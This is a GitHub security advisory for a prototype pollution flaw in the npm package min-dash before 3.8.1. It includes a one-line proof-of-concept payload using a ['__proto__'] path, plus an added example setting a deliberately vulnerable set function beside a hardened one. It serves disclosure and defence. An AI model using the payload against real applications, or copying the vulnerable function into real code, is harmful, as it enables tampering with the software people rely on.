Prototype pollution in min-dash < 3.8.1

High severity GitHub Reviewed Published Jan 27, 2022 in bpmn-io/min-dash • Updated Jan 11, 2023

Package

npm min-dash (npm)

Affected versions

< 3.8.1

Patched versions

3.8.1

Description

Impact

The set method, set(target, path, value), is vulnerable to prototype pollution: a specially crafted path lets a caller write an arbitrary property onto Object.prototype, which every plain object in the process then inherits, as the proof of concept below shows.

// insert the following into poc.js and run node poc.js (after installing the package)

let parser = require("min-dash");
parser.set({}, [["__proto__"], "polluted"], "success");
console.log(polluted); // prints "success": the property landed on Object.prototype
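To see why the proof of concept works and what a fix has to do, here is an added example that is not min-dash's own code: a minimal lodash-style set(target, path, value) in a vulnerable form and a hardened form. The bypass mechanism it models, a path segment that is an array and is only coerced to the string "__proto__" once it is used as a property key, is an assumption inferred from the shape of the proof of concept; the hardened form's rejection list and its choice to throw rather than silently skip are likewise this example's choices, not necessarily what min-dash 3.8.1 does.

```javascript
// Added example, not min-dash's code. Models a path-walking "set" helper
// in a vulnerable and a hardened form. Assumption: the vulnerable guard
// compares the raw path segment, so a non-string segment such as
// ['__proto__'] slips past it and still indexes Object.prototype.

// Keys that must never be used as a path segment (this example's list).
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable: the guard only rejects the exact string '__proto__'.
// ['__proto__'] !== '__proto__', yet current[['__proto__']] coerces the
// array to the string '__proto__' and returns Object.prototype.
function vulnerableSet(target, path, value) {
  let current = target;
  for (let i = 0; i < path.length; i++) {
    const key = path[i];
    if (key === '__proto__') {
      return target; // blocks the string form only
    }
    if (i === path.length - 1) {
      current[key] = value;
    } else {
      if (current[key] === undefined || current[key] === null) {
        current[key] = {};
      }
      current = current[key]; // becomes Object.prototype for ['__proto__']
    }
  }
  return target;
}

// Hardened: normalise every segment to a string before checking it, reject
// the dangerous keys outright, and only descend into own properties so an
// inherited value (Object.prototype or anything already polluted) is never
// used as the next container.
function safeSet(target, path, value) {
  let current = target;
  for (let i = 0; i < path.length; i++) {
    const key = String(path[i]);
    if (FORBIDDEN.has(key)) {
      throw new Error('illegal path segment: ' + key);
    }
    if (i === path.length - 1) {
      current[key] = value;
    } else {
      const own = Object.prototype.hasOwnProperty.call(current, key);
      if (!own || typeof current[key] !== 'object' || current[key] === null) {
        current[key] = {};
      }
      current = current[key];
    }
  }
  return target;
}

// Runs the advisory's proof-of-concept shape against one implementation and
// reports whether a fresh object picked up the injected property. Cleans
// Object.prototype afterwards so the rest of the process is unaffected.
function demonstrate(setFn, probe) {
  const before = ({})[probe];
  let threw = false;
  try {
    setFn({}, [['__proto__'], probe], 'success');
  } catch (e) {
    threw = true;
  }
  const after = ({})[probe];
  delete Object.prototype[probe];
  return { before: before, after: after, threw: threw };
}

console.log('vulnerable:', demonstrate(vulnerableSet, 'polluted'));
console.log('hardened:  ', demonstrate(safeSet, 'polluted'));
```

The important detail is the order of operations in the hardened version: the segment is coerced with String() first and checked second, so the check sees exactly the key the engine will use. A guard that inspects the raw value, whatever its type, can always be sidestepped by an input whose string form differs from its identity.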

Patches

min-dash >= 3.8.1 fixes the issue. Because min-dash is usually pulled in as a transitive dependency, check every resolved copy in a project (for example with npm ls min-dash) rather than only the top-level version.

Workarounds

No workarounds exist for the issue.

References

Closed via bpmn-io/min-dash#21.

Credits

Credits to Cristian-Alexandru STAICU, who found the vulnerability, and to Idan Digmi from the Snyk Security Team, who responsibly reported it to us.

@nikku nikku published to bpmn-io/min-dash Jan 27, 2022
Reviewed Jan 27, 2022
Published to the GitHub Advisory Database Feb 1, 2022
Last updated Jan 11, 2023

Severity

High

CVE ID

No known CVE

GHSA ID

GHSA-2m53-83f3-562j
